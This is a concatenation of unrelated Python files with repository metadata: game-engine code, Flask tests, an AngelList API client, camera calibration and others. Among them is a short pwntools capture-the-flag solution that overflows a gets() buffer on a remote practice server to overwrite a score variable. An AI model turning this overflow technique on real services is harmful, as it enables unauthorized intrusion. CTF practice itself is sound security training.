def gogui_rules_legal_moves_cmd(self, args):
game_end,_ = self.board.check_game_end_gomoku()
if game_end:
self.respond()
return
moves = GoBoardUtil.generate_legal_moves_gomoku(self.board)
gtp_moves = []
for move in moves:
coords = point_to_coord(move, self.board.size)
gtp_moves.append(format_point(coords))
sorted_moves = ' '.join(sorted(gtp_moves))
self.respond(sorted_moves)
def gogui_rules_side_to_move_cmd(self, args):
color = "black" if self.board.current_player == BLACK else "white"
self.respond(color)
def gogui_rules_board_cmd(self, args):
size = self.board.size
str = ''
for row in range(size-1, -1, -1):
start = self.board.row_start(row + 1)
for i in range(size):
point = self.board.board[start + i]
if point == BLACK:
str += 'X'
elif point == WHITE:
str += 'O'
elif point == EMPTY:
str += '.'
else:
assert False
str += '\n'
self.respond(str)
def gogui_rules_final_result_cmd(self, args):
game_end, winner = self.board.check_game_end_gomoku()
moves = self.board.get_empty_points()
board_full = (len(moves) == 0)
if board_full and not game_end:
self.respond("draw")
return
if game_end:
color = "black" if winner == BLACK else "white"
self.respond(color)
else:
self.respond("unknown")
def gogui_analyze_cmd(self, args):
self.respond("pstring/Legal Moves For ToPlay/gogui-rules_legal_moves\n"
"pstring/Side to Play/gogui-rules_side_to_move\n"
"pstring/Final Result/gogui-rules_final_result\n"
"pstring/Board Size/gogui-rules_board_size\n"
"pstring/Rules GameID/gogui-rules_game_id\n"
"pstring/Show Board/gogui-rules_board\n"
)
def point_to_coord(point, boardsize):
"""
Transform point given as board array index
to (row, col) coordinate representation.
Special case: PASS is not transformed
"""
if point == PASS:
return PASS
else:
NS = boardsize + 1
return divmod(point, NS)
def format_point(move):
"""
Return move coordinates as a string such as 'a1', or 'pass'.
"""
column_letters = "ABCDEFGHJKLMNOPQRSTUVWXYZ"
#column_letters = "abcdefghjklmnopqrstuvwxyz"
if move == PASS:
return "pass"
row, col = move
if not 0 <= row < MAXSIZE or not 0 <= col < MAXSIZE:
raise ValueError
return column_letters[col - 1]+ str(row)
def move_to_coord(point_str, board_size):
"""
Convert a string point_str representing a point, as specified by GTP,
to a pair of coordinates (row, col) in range 1 .. board_size.
Raises ValueError if point_str is invalid
"""
if not 2 <= board_size <= MAXSIZE:
raise ValueError("board_size out of range")
s = point_str.lower()
if s == "pass":
return PASS
try:
col_c = s[0]
if (not "a" <= col_c <= "z") or col_c == "i":
raise ValueError
col = ord(col_c) - ord("a")
if col_c < "i":
col += 1
row = int(s[1:])
if row < 1:
raise ValueError
except (IndexError, ValueError):
raise ValueError("illegal move: \"{}\" wrong coordinate".format(s))
if not (col <= board_size and row <= board_size):
raise ValueError("illegal move: \"{}\" wrong coordinate".format(s))
return row, col
def color_to_int(c):
"""convert character to the appropriate integer code"""
color_to_int = {"b": BLACK , "w": WHITE, "e": EMPTY,
"BORDER": BORDER}
return color_to_int[c]
| [
"boweiww@gmail.com"
] | boweiww@gmail.com |
876a38600caafb0020074dfb9d8bcc1fcd87330a | e2c2920d197e51201b0aa4127afe4a701d2f8722 | /lcy8047/HackCTF/Poet/ex.py | d33a857d62d8841678fffb993c13969b3491edde | [] | no_license | JinukHong/CTF | d564c7db194e165b37c1bc9f51fc1ffba9af1bb5 | a8765bd3b8028aeaccc0435d13ee1c2be94f8e41 | refs/heads/master | 2023-07-19T15:40:48.569456 | 2021-09-17T14:51:55 | 2021-09-17T14:51:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 577 | py | from pwn import *
'''
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
'''
r = remote("ctf.j0n9hyun.xyz", 3012)
# poet, author score가 전역변수로 설정되어 있었다.
# poet과 author 모두 gets로 받아 bof취약점이 있었고
# author는 64byte만큼 할당 되어있었고
# 바로 뒤에 score가 있어서 조건에 따라 1000000으로 덮어 주었다.
print(r.recv().decode('utf-8'))
r.sendline()
print(r.recv().decode('utf-8'))
r.sendline(b"A"*64+p32(1000000))
r.interactive() | [
"lcy8047@gmail.com"
] | lcy8047@gmail.com |
5890843886f71a5b8037a0e84989012f7b2a4c32 | 61527c79c6f6752ae926bb82b38d23106a77ba91 | /src/data/py.py | 6fb9ee7b9b37f41a8d835b3d0c962e94e24845b6 | [] | no_license | MetaNovitia/DataPortal | 0bd884e4ecdbf7e6bc216eff237217621389a8a6 | 56bbf5cbe0f8e7c4149a6ff40962d2d4b3cfc87f | refs/heads/master | 2023-01-24T16:07:12.012234 | 2020-02-12T22:08:07 | 2020-02-12T22:08:07 | 197,293,378 | 1 | 1 | null | 2023-01-04T04:38:28 | 2019-07-17T01:37:53 | JavaScript | UTF-8 | Python | false | false | 537 | py | import json
f=open("ns.json",'w')
d = {"Basin":[{},{}],"Region":[{},{}],"All":[{},{}]}
for i in range (1,406):
if i not in d["Basin"][0]: d["Basin"][0][i] = []
d["Basin"][0][i].append(str(i))
d["Basin"][1][i] = str(i)
if i//40 not in d["Region"][0]: d["Region"][0][i//40] = []
d["Region"][0][i//40].append(str(i))
d["Region"][1][i] = str(i//40)
if 0 not in d["All"][0]: d["All"][0][0] = []
d["All"][0][0].append(str(i))
d["All"][1][i] = "0"
f.write(json.dumps(d))
f.close() | [
"mnovitia@uci.edu"
] | mnovitia@uci.edu |
4d252038bcbc9eef1bf76cf1aad3a729a21082bc | 9d030f2fa76a53014dcf437cc436ecad6c95de0b | /Score_evaluator/migrations/0004_remove_category_likes.py | c28555126cc510d27a6370538b2a4c4830f7f3ad | [] | no_license | rotonmeta/SocialSearchEngine | 40776b296c3c76666ca472f9014f7f57a05a7dad | 661ac9be5fa1694b5a94bf9d514a3d6c11af4f2d | refs/heads/master | 2020-05-18T19:26:45.349597 | 2019-07-08T15:07:26 | 2019-07-08T15:07:26 | 173,291,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | # Generated by Django 2.2.1 on 2019-06-18 15:47
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Score_evaluator', '0003_remove_categoryscore_score'),
]
operations = [
migrations.RemoveField(
model_name='category',
name='likes',
),
]
| [
"roton-meta@live.com"
] | roton-meta@live.com |
090da0f152d71f00b414a43dc812e92cbe6ee8da | 4477b53f4cc0a5ac444a424a4b975406eccc50c0 | /APproject/tests/test_reservation.py | a83d39b09d600365b3037b342e0acafbd6af5ed2 | [] | no_license | V-Saikus/APlabs | 26330fd32ff34e6f39da7e560d17c8e59ddfbd54 | af08b0869c5324b958f8ad5cb829a3c458c0c0b6 | refs/heads/main | 2023-02-04T07:22:51.499155 | 2020-12-28T10:19:15 | 2020-12-28T10:19:15 | 309,087,299 | 0 | 0 | null | 2020-12-28T10:19:16 | 2020-11-01T12:07:34 | Python | UTF-8 | Python | false | false | 4,316 | py | from tests.test_audience import *
import base64
class MyThirdTest(TestCase):
def create_app(self):
# app = Flask(__name__)
app.config['TESTING'] = True
return app
def setUp(self):
db.session.commit()
db.create_all()
def tearDown(self):
db.session.commit()
db.drop_all()
def test_server_is_up_and_running(self):
http = urllib3.PoolManager()
url = 'http://localhost:5000/'
response = http.request('GET', url)
self.assertEqual(response.status, 200)
def test_post_reservation(self):
audience_test = MySecondTest()
audience_test.test_post_audience()
with app.test_client() as client:
error_response = client.post(
'/audience/reserve',
headers={'Content-Type': 'something',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(error_response.status_code, 400)
data = {'start_time': '2020-8-14 03:30:35.166',
'end_time': '2020-8-14 06:30:35.166',
'user_id': 1,
'audience_id': 1,
}
encoded_data = json.dumps(data).encode('utf-8')
response = client.post(
'/audience/reserve',
data=encoded_data,
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(response.status_code, 201)
def test_get_reservation_by_id(self):
with app.test_client() as client:
self.assertEqual(client.get('/audience/reserve/smth', ).status_code, 400)
self.test_post_reservation()
with app.test_client() as client:
response = client.get(
'/audience/reserve/1',
)
self.assertEqual(response.status_code, 200)
self.assertEqual(client.get('/audience/reserve/2', ).status_code, 404)
def test_update_reservation(self):
self.test_post_reservation()
with app.test_client() as client:
data = {'start_time': '2020-8-14 06:30:35.166',
'end_time': '2020-8-14 09:30:35.166',
}
encoded_data = json.dumps(data).encode('utf-8')
response = client.put(
'/reserve/1',
data=encoded_data,
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
invalid_reservation_response = client.put(
'/reserve/smth',
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
data1 = {}
encoded_data1 = json.dumps(data1).encode('utf-8')
invalid_body_response = client.put(
'/reserve/1',
data=encoded_data1,
headers={'Content-Type': 'application/json',
'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(response.status_code, 202)
self.assertEqual(invalid_reservation_response.status_code, 404)
self.assertEqual(invalid_body_response.status_code, 404)
def test_delete_reservation_by_id(self):
self.test_post_reservation()
with app.test_client() as client:
response = client.delete(
'/reserve/1',
headers={'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
invalid_reservation_response = client.delete(
'/reserve/smth',
headers={'Authorization': 'Basic ' + base64.b64encode('example18@mail.com:qwerty'.encode()).decode()}
)
self.assertEqual(response.status_code, 200)
self.assertEqual(invalid_reservation_response.status_code, 404)
| [
"kiltik12@gmail.com"
] | kiltik12@gmail.com |
fa870428c18812b9d152127aa4df6cc4092bdbff | e967290f67437c0afcbb4597e9ba6020761f2a45 | /github.com/ceph/ceph-deploy/ceph_deploy/util/wrappers.py | 4bff77b5657b6ea0ac484359fb93d3a804362451 | [
"MIT"
] | permissive | mp-rheinrich/mp-fs-sandbox | 77bf40a27a0d6c2b38cbc7562023a92fca8751c0 | 35c38ac9d4d7ad941facfd24ab0a068630c57bdf | refs/heads/master | 2020-05-31T11:13:13.474102 | 2013-08-21T12:59:11 | 2013-08-21T12:59:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,052 | py | """
In a lot of places we need to make system calls, mainly through subprocess.
Here we define them and reuse them with the added functionality of getting
logging and remote execution.
This allows us to only remote-execute the actual calls, not whole functions.
"""
from ceph_deploy.util.decorators import remote_compile
from ceph_deploy.util import context
def check_call(conn, logger, args, *a, **kw):
"""
Wraps ``subprocess.check_call`` for a remote call via ``pushy``
doing all the capturing and logging nicely upon failure/success
The mangling of the traceback when an exception ocurrs, is because the
caller gets eating up by not being executed in the actual function of
a given module (e.g. ``centos/install.py``) but rather here, where the
stack trace is no longer relevant.
:param args: The args to be passed onto ``check_call``
"""
command = ' '.join(args)
patch = kw.pop('patch', True) # Always patch unless explicitly told to
logger.info('Running command: %s' % command)
def remote_call(args, *a, **kw):
import subprocess
subprocess.check_call(
args,
*a,
**kw
)
with context.remote(conn, logger, remote_call, mangle_exc=False, patch=patch) as call:
try:
return call(args, *a, **kw)
except Exception as err:
import inspect
stack = inspect.getframeinfo(inspect.currentframe().f_back)
if hasattr(err, 'remote_traceback'):
logger.error('Traceback (most recent call last):')
logger.error(' File "%s", line %s, in %s' % (
stack[0],
stack[1],
stack[2])
)
err.remote_traceback.pop(0)
for line in err.remote_traceback:
if line:
logger.error(line)
raise RuntimeError('Failed to execute command: %s' % ' '.join(args))
else:
raise err
| [
"roman.heinrich@gmail.com"
] | roman.heinrich@gmail.com |
0a418fc8812aada8d4b208cdc5ff09a38eebd7ae | 125d2d87b993280dfcec0d755655cf0d2e8a7194 | /Computer_Files/Test/calibrate_camera.py | d32bc64d1f576fe58a61d4356bfc65f3a5731af1 | [] | no_license | QuentinCar/DemoHydro | ab1383728050d1b2b0b0c14ad6db773933076a46 | 3ab12db8befab68e5931a284aa66352ebddd45cc | refs/heads/master | 2020-06-21T04:18:26.614428 | 2019-09-17T12:46:24 | 2019-09-17T12:46:24 | 197,342,043 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,480 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 12 14:15:55 2019
@author: Quentin
"""
import numpy as np
import cv2
import glob
def calibration():
print("Define Calibration Parameter...")
# termination criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
objp = np.zeros((6*7,3), np.float32)
objp[:,:2] = np.mgrid[0:7,0:6].T.reshape(-1,2)
# Arrays to store object points and image points from all the images.
objpoints = [] # 3d point in real world space
imgpoints = [] # 2d points in image plane.
images = glob.glob('calib_images/*.jpg')
i = 0
for fname in images:
print(len(images)-i, " images remaining")
i+=1
img = cv2.imread(fname)
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
# Find the chess board corners
ret, corners = cv2.findChessboardCorners(gray, (7,6),None)
# If found, add object points, image points (after refining them)
if ret == True:
objpoints.append(objp)
corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)
imgpoints.append(corners2)
# Draw and display the corners
# img = cv2.drawChessboardCorners(img, (7,6), corners2,ret)
# cv2.imshow('img',cv2.resize(img,(int(img.shape[1]*0.4),int(img.shape[0]*0.4))))
# cv2.waitKey(5)
# cv2.destroyAllWindows()
ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)
print("Get Optimal Parameter...")
h, w = img.shape[:2]
newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))
return newcameramtx, roi, mtx, dist
def undistort(img, newcameramtx, roi, mtx, dist):
# print("Undistort image...")
# undistort
dst = cv2.undistort(img, mtx, dist, None, newcameramtx)
# print("Crop Image according to ROI...")
# crop the image
x,y,w,h = roi
dst = dst[y:y+h, x:x+w]
# cv2.imshow('calibresult',cv2.resize(dst,(int(dst.shape[1]*0.4),int(dst.shape[0]*0.4))))
return dst
if __name__ == "__main__":
img = cv2.imread("left0.jpg")
newcameramtx, roi, mtx, dist = calibration()
new_img = undistort(img, newcameramtx, roi, mtx, dist)
cv2.imshow('calibresult',cv2.resize(new_img,(int(new_img.shape[1]*0.4),int(new_img.shape[0]*0.4)))) | [
"cardinal.quentin@gmail.com"
] | cardinal.quentin@gmail.com |
61cf636fe1e3b402dd46f44f844e6cd651afc53b | a5ca50c35dd71667ec905b883bd3f181ab5d2cab | /applications/FluidDynamicsApplication/symbolic_generation/compressible_navier_stokes/generate_stabilization_matrix.py | 5c49316a2a83b9cd0bc5ce9eab985c8941e03480 | [
"BSD-3-Clause"
] | permissive | philbucher/Kratos | 74aeed105fb283caa2a2e84f44229d4ff657099e | 1ceb900dbacfab344e27e32285250eafc52093ec | refs/heads/master | 2022-03-19T08:38:33.276133 | 2021-11-19T12:14:53 | 2021-11-19T12:14:53 | 216,619,563 | 1 | 0 | NOASSERTION | 2021-11-19T12:14:54 | 2019-10-21T16:54:08 | C++ | UTF-8 | Python | false | false | 2,472 | py | from sympy import *
from KratosMultiphysics import *
from KratosMultiphysics.sympy_fe_utilities import *
def ComputeStabilizationMatrix(params):
"""This function calculates the stabilization matrix"""
print("\nCompute stabilization matrix\n")
dim = params["dim"] # Spatial dimensions
Tau = zeros(dim+2,dim+2) # Stabilization Matrix
tau1 = Symbol('tau1')
tau2 = Symbol('tau2')
tau3 = Symbol('tau3')
Tau[0,0] = tau1
for i in range (0,dim):
Tau[i + 1, i + 1] = tau2
Tau[dim + 1, dim + 1] = tau3
return(Tau)
def ComputeStabilizationMatrixOnGaussPoint(params, U_gauss, f_gauss, r_gauss, mu_sc_gauss = 0.0, lamb_sc_gauss = 0.0):
"""This function calculates the stabilization matrix on a Gauss point"""
print("\t- Compute stabilization matrix on Gauss pt.")
# Calculate auxiliary values
rho_g = U_gauss[0]
e_t_g = U_gauss[params["dim"] + 1]
norm_v_squared = 0.0
norm_f_squared = 0.0
for d in range(params["dim"]):
norm_v_squared += (U_gauss[d + 1] * U_gauss[d + 1]) / (rho_g * rho_g)
norm_f_squared += f_gauss[d] * f_gauss[d]
norm_v = sqrt(norm_v_squared)
nu = (params["mu"] + mu_sc_gauss) / rho_g
alpha = (params["lambda"] + lamb_sc_gauss) / (rho_g * params["gamma"] * params["c_v"])
# Calculate sound speed
c = sqrt(params["gamma"] * (params["gamma"] -1) * ((e_t_g / rho_g) - ((1.0 / 2.0) * norm_v_squared)))
# Calculate stabilization constants
tau1_inv = (params["stab_c2"] * (norm_v + c)) / params["h"]
tau1_inv += params["stab_c3"] * sqrt((r_gauss**2 + 2.0 * c**2 * norm_f_squared + sqrt(r_gauss**4 + 4.0 * c**2 * norm_f_squared *r_gauss**2)) / (2.0 * c**4))
tau2_inv = ((params["stab_c1"] * 4.0 * nu) / (3 * params["h"]**2)) + tau1_inv
tau3_inv = (params["stab_c1"] * alpha / params["h"]**2) + tau1_inv
# Save the obtained values in the stabilization matrix
Tau = zeros(params["dim"] + 2, params["dim"] + 2)
Tau[0,0] = 1.0 / tau1_inv
for i in range (params["dim"]):
Tau[i + 1, i + 1] = 1.0 / tau2_inv
Tau[params["dim"] + 1, params["dim"] + 1] = 1.0 / tau3_inv
return(Tau)
def PrintStabilizationMatrix(Tau, params):
"""Auxiliary function to print the stabilization matrix"""
print("The Stabilization term matrix is:\n")
dim = params["dim"]
for i in range (0,dim+2):
for j in range (0,dim+2):
print("Tau[",i,",",j,"]=",Tau[i,j],"\n")
return 0
| [
"rubenzorrillamartinez@hotmail.com"
] | rubenzorrillamartinez@hotmail.com |
70972eb1ec404daa58b302a2aba95cc9f7fb235c | 2449d8ca3bb5dd377d7de2058398352405c86aaf | /hw3/2a_testCNN.py | ad62662fc36f89bc85c641c64d4d7070c3787768 | [] | no_license | chenchc/ML2016 | f4e6f5c6d8a089771bac5b5f49ef2d11c4b839c7 | c04f213fb42b99c2de67509bf1acb2cb0fde4080 | refs/heads/master | 2021-03-24T09:14:49.342513 | 2016-12-08T09:08:23 | 2016-12-08T09:08:23 | 68,990,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import os
from keras.models import load_model
import a_model
import pickle
import sys
import numpy
import random
import csv
def readTestData(filename):
with open(filename) as file:
testData = pickle.load(file)
testMatrix = []
for i in range(len(testData['data'])):
instance = testData['data'][i]
instanceInXYC = numpy.ndarray((32, 32, 3))
for c in range(3):
for y in range(32):
for x in range(32):
instanceInXYC[y, x, c] = float(instance[c * 32 * 32 + y * 32 + x]) / 255
testMatrix.append(instanceInXYC)
return numpy.array(testMatrix)
# Parse Arguments
testDataPath = sys.argv[1]
modelPath = sys.argv[2]
outputPath = sys.argv[3]
# Read Data
testMatrix = readTestData(testDataPath + "/test.p")
# Test
model = load_model(modelPath)
predict = model.predict_classes(testMatrix, batch_size=8)
with open(outputPath, 'wb') as file:
writer = csv.writer(file, delimiter=',')
writer.writerow(['ID', 'class'])
for i in range(len(predict)):
writer.writerow([i, predict[i]])
| [
"r05922063@ntu.edu.tw"
] | r05922063@ntu.edu.tw |
6a9a2140c3b9497705914e18dd94ed31139bc3b7 | bd6bfc81cd266c8623543473c64bacda131b39a6 | /angellist.py | cea22da59c2b95eadf0ef01a6e7523bbd4cb7e8e | [] | no_license | troyshu/angellistalumnibot | 5b2fba65907dc6e35f444e042e3ba6c6ef4214c8 | dd7aaf0cb884e36473295c344a0d45ab3c28beb2 | refs/heads/master | 2016-09-09T23:17:56.984129 | 2014-02-19T13:47:47 | 2014-02-19T13:47:47 | 16,949,225 | 8 | 6 | null | null | null | null | UTF-8 | Python | false | false | 18,237 | py | #######################################################################################
# Python implementation of AngelList OAuth Authorization and API. #
# #
# Author: Kevin Marshall #
# Email : info@falicon.com #
# Web: http://www.falicon.com #
# #
#######################################################################################
import hashlib
import urllib, urllib2
from werkzeug.urls import *
try:
import simplejson as json
except ImportError:
import json
"""
Provides a Pure Python AngelList API Interface.
"""
class AngelListError(Exception):
"""
generic exception class; may be thrown by various errors in the OAuth flow
"""
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class AngelList(object):
def __init__(self):
"""
AngelList Base class that simply implements AngelList OAuth Authorization and
AngelList APIs such as Activity Feeds, Follows, Reviews, Startups,
Startup Roles, Status Updates, Tags, and Users.
Please create an application from the link below if you do not have an API key
and secret key yet.
- http://angel.co/api/oauth/clients
"""
# Credientials
self.URI_SCHEME = "https"
self.API_ENDPOINT = "%s://api.angel.co" % self.URI_SCHEME
self.OAUTH_ENDPOINT = "%s://angel.co/api" % self.URI_SCHEME
self.ACCESS_TOKEN_URL = "/oauth/token"
self.AUTHORIZATION_URL = "/oauth/authorize"
self.client_id = None
self.client_secret = None
self.access_token = None
#############################
# OAUTH SPECIFIC SECTION
#############################
def getAuthorizeURL(self, client_id = None, ):
self.client_id = client_id and client_id or self.client_id
if self.client_id is None:
raise AngelListError("client_id is NULL. Plase set this or pass it as a parameter first.")
return "%s%s?client_id=%s&response_type=code" % (self.OAUTH_ENDPOINT, self.AUTHORIZATION_URL, self.client_id)
def getAccessToken(self, client_id = None, client_secret = None, code = None):
self.client_id = client_id and client_id or self.client_id
if self.client_id is None:
raise AngelListError("client_id is NULL. Plase set this or pass it as a parameter first.")
self.client_secret = client_secret and client_secret or self.client_secret
if self.client_secret is None:
raise AngelListError("client_secret is NULL. Plase set this or pass it as a parameter first.")
if code is None:
raise AngelListError("code is NULL. Plase pass the REQUEST['code'] angel.co/api/oauth/authorize responeded with as a parameter.")
url = "%s%s?client_id=%s&client_secret=%s&code=%s&grant_type=authorization_code" % (self.OAUTH_ENDPOINT, self.ACCESS_TOKEN_URL, self.client_id, self.client_secret, code)
try:
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
params = urllib.urlencode({})
response = urllib2.urlopen(urllib2.Request(url, params, headers))
json_data = json.loads(response.read())
access_token = json_data['access_token']
except:
# access token failed to fetch (for any reason); so we'll just return blank
access_token = ''
self.access_token = access_token
return access_token
#############################
# GENERAL HELPER FUNCTIONS
#############################
def do_get_request(self, url):
"""
perform a GET request to the supplied url
"""
response = urllib2.urlopen(url)
return json.loads(response.read())
def do_post_request(self, url, data = None):
"""
perform a POST request to the supplied url with the given fieldvalues
"""
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
params = urllib.urlencode(data)
response = urllib2.urlopen(urllib2.Request(url, params, headers))
return json.loads(response.read())
def do_delete_request(self, url, data = None):
"""
perform a DELETE request to the supplied url
"""
opener = urllib2.build_opener(urllib2.HTTPHandler)
params = urllib.urlencode(data)
request = urllib2.Request(url, params)
request.add_header('Content-Type', 'text/plain')
request.get_method = lambda: 'DELETE'
response = opener.open(request)
return json.loads(response.read())
def check_access_token(self, access_token = None):
self.access_token = access_token and access_token or self.access_token
if self.access_token is None:
raise AngelListError("access_token is Null. Please set it first")
return
#############################
# ANGEL.CO API FUNCTIONS
#############################
##########################################################
# Activity Feeds (http://angel.co/api/spec/activity_feeds)
# (GET) https://api.angel.co/1/feed
def getFeed(self, access_token = None):
self.check_access_token(access_token)
return self.do_get_request('%s/1/feed?access_token=%s' % (self.API_ENDPOINT, self.access_token))
##########################################################
# Follows (http://angel.co/api/spec/follows)
### NOT WORKING YET [[DELETE ISSUE]]
# (DELETE) https://api.angel.co/1/follows [type, id]
def deleteFollows(self, access_token = None, follow_type = None, follow_id = None):
"""
follow_type - REQUIRED - 'user' or 'startup'
id - REQUIRED - the id of the user or startup to stop following
"""
self.check_access_token(access_token)
if follow_type is None:
raise AngelListError("the follow_type param is required for this api call.")
if follow_id is None:
raise AngelListError("the follow_id param is required for this api call.")
data = {'type':follow_type, 'id':follow_id}
url = "%s/1/follows?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_delete_request(url, data)
# (POST) https://api.angel.co/1/follows [type, id]
def addFollows(self, access_token = None, follow_type = None, follow_id = None):
"""
follow_type - REQUIRED - 'user' or 'startup'
id - REQUIRED - the id of the user or startup to stop following
"""
self.check_access_token(access_token)
if follow_type is None:
raise AngelListError("the follow_type param is required for this api call.")
if follow_id is None:
raise AngelListError("the follow_id param is required for this api call.")
data = {'type':follow_type, 'id':follow_id}
url = "%s/1/follows?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_post_request(url, data)
# (GET) https://api.angel.co/1/users/:id/followers
def getFollowers(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/followers?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/:id/followers/ids
def getFollowersIds(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/followers/ids?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/:id/following
def getFollowing(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/following?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/users/:id/following/ids
def getFollowingIds(self, access_token = None, user_id = None):
self.check_access_token(access_token)
if user_id is None:
raise AngelListError("the user_id param is required for this api call.")
return self.do_get_request('%s/1/users/%s/following/ids?access_token=%s' % (self.API_ENDPOINT, user_id, self.access_token))
# (GET) https://api.angel.co/1/startups/:id/followers
def getStartupsFollowers(self, access_token = None, startup_id = None):
self.check_access_token(access_token)
if startup_id is None:
raise AngelListError("the startup_id param is required for this api call.")
return self.do_get_request('%s/1/startups/%s/followers?access_token=%s' % (self.API_ENDPOINT, startup_id, self.access_token))
# (GET) https://api.angel.co/1/startups/:id/followers/ids
def getStartupsFollowersIds(self, access_token = None, startup_id = None):
self.check_access_token(access_token)
if startup_id is None:
raise AngelListError("the startup_id param is required for this api call.")
return self.do_get_request('%s/1/startups/%s/followers/ids?access_token=%s' % (self.API_ENDPOINT, startup_id, self.access_token))
##########################################################
# Reviews (http://angel.co/api/spec/reviews)
# (GET) https://api.angel.co/1/reviews
def getReviews(self, access_token = None, user_id = None):
"""
user_id - OPTIONAL - id of the user you want reviews on (defaults to auth'ed user)
"""
self.check_access_token(access_token)
return self.do_get_request('%s/1/reviews?access_token=%s&user_id=%s' % (self.API_ENDPOINT, self.access_token, user_id))
##########################################################
# Startups (http://angel.co/api/spec/startups)
# (GET) https://api.angel.co/1/startups/:id
def getStartups(self, access_token = None, startup_id = None):
self.check_access_token(access_token)
if startup_id is None:
raise AngelListError("the startup_id param is required for this api call.")
return self.do_get_request('%s/1/startups/%s?access_token=%s' % (self.API_ENDPOINT, startup_id, self.access_token))
# (GET) https://api.angel.co/1/startups/search
def getStartupsSearch(self, access_token = None, slug = None, domain = None):
"""
slug - OPTIONAL - the slug for the startup you are searching for
domain - OPTIONAL - the domain of the startup you are searching for
"""
self.check_access_token(access_token)
url = '%s/1/startups/search?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if slug:
url = '%s&slug=%s' % (url, slug)
if domain:
url = '%s&domain=%s' % (url, domain)
return self.do_get_request(url)
# (GET) https://api.angel.co/1/tags/:id/startups
def getTagsStartups(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s/startups?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
##########################################################
# Startup Roles (http://angel.co/api/spec/startup_roles)
# (GET) https://api.angel.co/1/startup_roles
def getStartupRoles(self, access_token = None, user_id = None, startup_id = None):
"""
user_id - OPTIONAL - the user who's startup relationships you want to view
startup_id - OPTIONAL - the startup who's user relationships you want to view
"""
self.check_access_token(access_token)
url = '%s/1/startups_roles?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if user_id:
url = '%s&user_id=%s' % (url, user_id)
if startup_id:
url = '%s&startup_id=%s' % (url, startup_id)
return self.do_get_request(url)
##########################################################
# Status Updates (http://angel.co/api/spec/status_update)
# (GET) https://api.angel.co/1/status_updates
def getStatusUpdates(self, access_token = None, user_id = None, startup_id = None):
"""
user_id - OPTIONAL
startup_id - OPTIONAL
"""
self.check_access_token(access_token)
url = '%s/1/startups_updates?access_token=%s' % (self.API_ENDPOINT, self.access_token)
if user_id:
url = '%s&user_id=%s' % (url, user_id)
if startup_id:
url = '%s&startup_id=%s' % (url, startup_id)
return self.do_get_request(url)
# (POST) https://api.angel.co/1/status_updates
def postStatusUpdates(self, access_token = None, startup_id = None, message = None):
"""
startup_id - OPTIONAL - id of the startup you want to updated.
message - REQUIRED - the status message to post
"""
self.check_access_token(access_token)
if message is None:
raise AngelListError("the message param is required for this api call.")
data = {'message':message}
if startup_id:
data['startup_id'] = startup_id
url = "%s/1/status_updates?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_post_request(url, data)
# (DELETE) https://api.angel.co/1/status_updates/:id
def deleteStatusUpdates(self, access_token = None, status_id = None):
self.check_access_token(access_token)
if status_id is None:
raise AngelListError("the status_id param is required for this api call.")
data = {'id':status_id}
url = "%s/1/status_updates?access_token=%s" % (self.API_ENDPOINT, self.access_token)
return self.do_delete_request(url, data)
##########################################################
# Tags (http://angel.co/api/spec/tags)
# (GET) https://api.angel.co/1/tags/:id
def getTags(self, access_token = None, tag_id = None):
self.check_access_token(access_token)
if tag_id is None:
raise AngelListError("the tag_id param is required for this api call.")
return self.do_get_request('%s/1/tags/%s?access_token=%s' % (self.API_ENDPOINT, tag_id, self.access_token))
# (GET) https://api.angel.co/1/tags/:id/children
